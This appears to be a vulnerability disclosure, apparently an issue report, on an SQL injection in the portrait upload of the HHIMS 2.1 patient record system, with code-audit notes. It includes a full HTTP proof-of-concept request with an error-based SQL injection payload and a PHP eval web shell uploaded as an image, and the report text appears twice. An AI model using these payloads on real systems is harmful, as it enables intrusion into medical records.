HHIMS is a free and open-source software system used to store and retrieve a simple patient medical record. The system was programmed by Lunar Technologies for the ICTA (Information and Communication Technology Agency of the Sri Lankan Government).
Each patient has a corresponding PID parameter,
In the function of uploading patient portrait, PID is a controllable variable, and PID parameters can be brought into the database for query, thus causing SQL injection vulnerabilities.
The paths are application/modules/attach/controllers/attach.php and application/models/persistent. php
Code audit:
In the attach controller, lines 51-99, save_ The portlet function is used to upload and save pictures. The parameters sent by the front-end through POST include x, y, w, h and variable PID
At the code line 58, the function in the contemporary controller is called. In the contemporary controller, variables are brought into the database for query without filtering
SQL injection vulnerability points are shown in the figure below
2.We can use sqlmap to validate
Boolean blind note
Error injection
3.Manual SQL injection proof
Manual verification
Burpsuite verification
4.SQL injection POC
POST /index.php/attach/save_portrait HTTP/1.1
Host: hhims.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Cookie: PHPSESSID=ha23p18u46aqdcofn4hr2ae783; ci_session=a%3A18%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226d0686706e577604e98e7b88dbf0ce0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A111%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F107.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1668046818%3Bs%3A3%3A%22UID%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22last_prescription_cmd%22%3Bs%3A7%3A%22by_name%22%3Bs%3A5%3A%22Title%22%3Bs%3A3%3A%22Mr.%22%3Bs%3A9%3A%22FirstName%22%3Bs%3A16%3A%22Thurairajasingam%22%3Bs%3A4%3A%22Post%22%3Bs%3A14%3A%22Lab+Technician%22%3Bs%3A8%3A%22UserName%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22FullName%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A9%3A%22UserGroup%22%3Bs%3A10%3A%22Programmer%22%3Bs%3A8%3A%22Hospital%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A15%3A%22DefaultLanguage%22%3Bs%3A7%3A%22English%22%3Bs%3A13%3A%22hospital_info%22%3Ba%3A31%3A%7Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Name%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A10%3A%22Telephone1%22%3Bs%3A7%3A%221234566%22%3Bs%3A10%3A%22Telephone2%22%3Bs%3A0%3A%22%22%3Bs%3A14%3A%22Address_Street%22%3Bs%3A14%3A%22No+2+Lake+Road%22%3Bs%3A15%3A%22Address_Village%22%3Bs%3A13%3A%22Gamagoda+West%22%3Bs%3A18%3A%22Address_DSDivision%22%3Bs%3A9%3A%22Dodangoda%22%3Bs%3A16%3A%22Address_District%22%3Bs%3A8%3A%22Kalutara%22%3Bs%3A15%3A%22Address_Country%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22Address_ZIP%22%3Bs%3A1%3A%220%22%3Bs%3A10%3A%22CreateDate%22%3Bs%3A19%3A%220000-00-00+00%3A00%3A00%22%3Bs%3A10%3A%22CreateUser%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22LastUpDate%22%3Bs%3A19%3A%222015-08-13+20%3A32%3A57%22%3Bs%3A14%3A%22LastUpDateUser%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A6%3A%22Active%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Code%22%3Bs%3A4%3A%220001%22%3Bs%3A4%3A%22Type%22%3Bs%3A3%3A%22PBH%22%3Bs%3A11%3A%22Current_BHT%22%3Bs%3A8%3A%222015%2F2%2F2%22%3Bs%3A18%3A%22Display_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A23%3A%22Display_Zero_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A19%3A%22Dispense_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Display_Previous_Drug%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Use_One_Field_Name%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22Use_Calendar_DOB%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Instant_Validation%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Number_NIC_Validation%22%3Bs%3A1%3A%220%22%3Bs%3A8%3A%22LIC_Info%22%3Bs%3A149%3A%22HOSPITAL+NAME%3DKalutara+ServernHOSPITAL+Key%3Dca9792275c984972591f9d949cd7a4c85e04facfnBARCODE%3DYesnAPPOINTMENTSYSTEM%3DYesnAUTOANALIZER%3DYesnATTACHFILE%3DYes%22%3Bs%3A15%3A%22Visit_ICD_Field%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22occupation_field%22%3Bs%3A1%3A%220%22%3Bs%3A18%3A%22Visit_SNOMED_Field%22%3Bs%3A1%3A%220%22%3Bs%3A17%3A%22Token_Footer_Text%22%3Bs%3A44%3A%22Appointment+system+programmed+by+Lunar+Tech.%22%3B%7Ds%3A10%3A%22reset_suer%22%3Bs%3A1%3A%223%22%3Bs%3A3%3A%22mid%22%3Bs%3A1%3A%224%22%3B%7D105940c11bc7b0aeafafcc429005fe67
Origin: http://hhims.test
Referer: http://hhims.test/index.php/attach/portrait/1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="w"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="h"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="PID"
Content-Type: form-data
1" AND ROW(1,2)>(SELECT COUNT(*),CONCAT((SELECT USER()),FLOOR(RAND(0)*2))x FROM (SELECT 6927 UNION SELECT 9908 UNION SELECT 1 UNION SELECT 2)a GROUP BY x) AND "ace"="ace
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="image"; filename="ace.jpg"
Content-Type: form-data
<?php eval(@$_POST['ace']);?>
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="x"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="y"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75--
The text was updated successfully, but these errors were encountered:
1.SQL injection vulnerability exists in HHIMS V2.1 of patient medical record system
System version: 2.1
Vulnerability URL:http://hhims.test/index.php/attach/portrait/1
Build environment: Apache 2.4.39; MySQL5.0.96; PHP5.6.9
Vulnerability description:
The paths are application/modules/attach/controllers/attach.php and application/models/persistent. php
Code audit:
SQL injection vulnerability points are shown in the figure below
2.We can use sqlmap to validate
3.Manual SQL injection proof
4.SQL injection POC
The text was updated successfully, but these errors were encountered: